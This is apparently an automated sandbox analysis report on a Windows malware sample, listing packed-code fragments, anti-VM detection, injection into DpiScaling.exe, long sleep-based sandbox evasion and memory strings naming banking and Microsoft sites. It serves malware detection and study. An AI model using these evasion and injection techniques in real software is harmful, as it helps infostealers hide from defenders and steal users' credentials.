Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_004186EA push D99DE006h; ret	7_2_004186FD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00418E9D push dword ptr [esi-79D6743Eh]; ret	7_2_00418EA4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C09AD push ecx; mov dword ptr [esp], ecx	7_2_019C09B6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047027FA pushad ; ret	11_2_047027F9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0470225F pushad ; ret	11_2_047027F9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0470283D push eax; iretd	11_2_04702858
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047309AD push ecx; mov dword ptr [esp], ecx	11_2_047309B6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0069C060 push edi; iretd	11_2_0069C06C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0069C05D push edi; iretd	11_2_0069C06C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0069C03F push ebp; retf	11_2_0069C046
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00696569 push ss; ret	11_2_00696571
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00692B68 push FFFFFFD5h; retf B30Ah	11_2_00692BB9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068ECF5 push edi; iretd	11_2_0068ED01
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00694E45 push ebp; iretd	11_2_00694E46

Source: SLq0ulC3Wf.exe

Static PE information: section name: .text entropy: 7.742139224831791

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SLq0ulC3Wf.exe PID: 7416, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: 33E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: 95C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: 7F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: A5C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Memory allocated: B5C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Code function: 7_2_01A0096E rdtsc

7_2_01A0096E

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5598	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1589	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Window / User API: threadDelayed 9798	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\DpiScaling.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 8136	Thread sleep count: 175 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 8136	Thread sleep time: -350000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 8136	Thread sleep count: 9798 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 8136	Thread sleep time: -19596000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe TID: 8156	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\DpiScaling.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\DpiScaling.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 11_2_0069CE10 FindFirstFileW,FindNextFileW,FindClose,

11_2_0069CE10

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: -631756.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: DpiScaling.exe, 0000000B.00000002.2682572284.0000000007A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: browser_essentials_safety_esm_protectionsInteractive Brokers - EU WestVMware20,11696494690n
Source: -631756.11.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: DpiScaling.exe, 0000000B.00000002.2682572284.0000000007A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116964946903
Source: -631756.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: -631756.11.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: -631756.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: -631756.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: -631756.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
